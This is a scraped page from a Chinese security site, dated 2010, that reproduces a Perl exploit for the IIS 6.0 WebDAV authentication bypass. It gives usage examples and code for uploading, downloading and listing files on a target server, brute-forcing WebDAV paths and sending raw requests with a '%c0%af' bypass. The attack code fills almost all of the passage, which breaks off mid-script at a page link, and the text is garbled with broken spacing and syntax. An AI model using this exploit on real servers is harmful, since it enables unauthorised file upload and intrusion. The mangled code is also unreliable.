IIS 6.0 remote overflow vulnerability-vulnerability warning-the black bar safety net

2010-10-04T00:00:00
ID MYHACK58:62201028013
Type myhack58
Reporter 佚名
Modified 2010-10-04T00:00:00

Description

Microsoft IIS 6.0 is a remote overflow vulnerability code

exp:

!/ usr/bin/perl

* !!! WARNING!!! *

* FOR SECURITY TESTiNG ONLY! *

*****

MS IIS 6.0 WebDAV Auth. Bypass Exploit v1. 1

v1. 1 add brute force dir fuction.

v1. 0 download? upload and list dir.

Usage:

IIS6_webdav.pl -target-port-method-webdavpath-BruteForcePath [-file]

-target &nbs p; eg.: 192.168.1.1

-port eg.: 8 0

-method eg.: g

(p:PUT,g:GET,l:LIST)

-webdavpath eg.: webdav

-BruteForcePath eg.: brute force webdav path

-file (optional) eg.: test. aspx

Example:

put a file:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m p-x-webdav-f test. aspx

get a file:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m g-x-webdav-f test. aspx

the list of dir:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m l-x webdav

brute force + list dir:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m l-b dirdic.txt

brute force + get the file:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m g-b dirdic.txt -f test. aspx

use IO::Socket;use Getopt::Long;

use threads; use threads::shared;

Globals Go Here.

my $target; # Host being probed. my $port; # Webserver port. my $method; # HTTP Method, PUT GET or . my $xpath; # WebDAV path on Webserver. my $bpath; # Bruteforce WebDAV path. my $file; # file name. my $httpmethod; my $Host_Header; # The Host header has to be changed

GetOptions( "target=s" ; => \$target, "port=i" => \$port, "method=s" => \$method, "xpath=s" => \$xpath, "bpath=s" => \$bpath, "file=s" => \$file, "help?" => sub { hello(); exit(0); } );

$error .= "Error: You must specify a target host\n" if ((!$ target)); $error .= "Error: You must specify a target port\n" if ((!$ port)); $error .= "Error: You must specify a put,get or list method\n" if ((!$ method)); $error .= "Error: You must specify a webdav path\n" if ((!$ xpath) && (!$ bpath)); $error .= "Error: You must specify a upload or download file name\n" if ((!$ file) && $method != "l");

if ($error) { print "Try $0-help or -?' for more information.\ n$error\n" ; exit; }

hello();

if ($method eq "p") { $httpmethod = "PUT"; } elsif ($method eq "g") { $httpmethod = "GET"; } elsif ($method eq "l") { $httpmethod = "PROPFIND"; } else { print "$method Method not accept !!!\ n"; exit(0); }

******

* We testing WebDAV methods first *

******

webdavtest($target,$port);

end of WebDAV testing.

******

* We try to brute forceing WebDAV path *

******

if ($bpath) { $xpath = webdavbf($target,$port,$bpath); }

end of brute force

print "-" x-6 0 ."\ n"; if ($httpmethod eq "PUT") { my $content; my $data;

cacl file size

$filesize = -s $file; print "$file size is $filesize bytes\n"; open(INFO, $file) die("Could not open file!"); #@lines=<INFO>; binmode(INFO); #binary while( read(INFO, $data, $filesize)) { $content .= $data; } close(INFO);

print $content;

$Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n"; } elsif ($httpmethod eq "GET") { $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n"; } elsif ($httpmethod eq "PROPFIND") { $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n"; $Host_Header = $Host_Header."& lt;? xml version=\"1.0\" encoding=\"utf-8\"?& gt;<D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; } print "-" x-6 0 ."\ n$httpmethod $file , Please wait ...\n"."-" x 6 0 ."\ n";

**** **

* Sending HTTP request *

******

if ($httpmethod eq "PUT") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,1 0);

[1] [2] [3] next